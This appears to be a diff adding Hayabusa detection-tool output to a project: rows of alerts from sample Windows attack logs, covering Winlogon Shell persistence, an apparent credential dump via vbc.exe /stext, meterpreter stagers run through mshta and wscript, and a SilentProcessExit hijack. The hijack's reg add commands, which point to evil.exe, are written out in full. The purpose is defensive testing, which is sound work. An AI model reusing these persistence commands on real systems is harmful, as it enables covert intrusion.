+2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
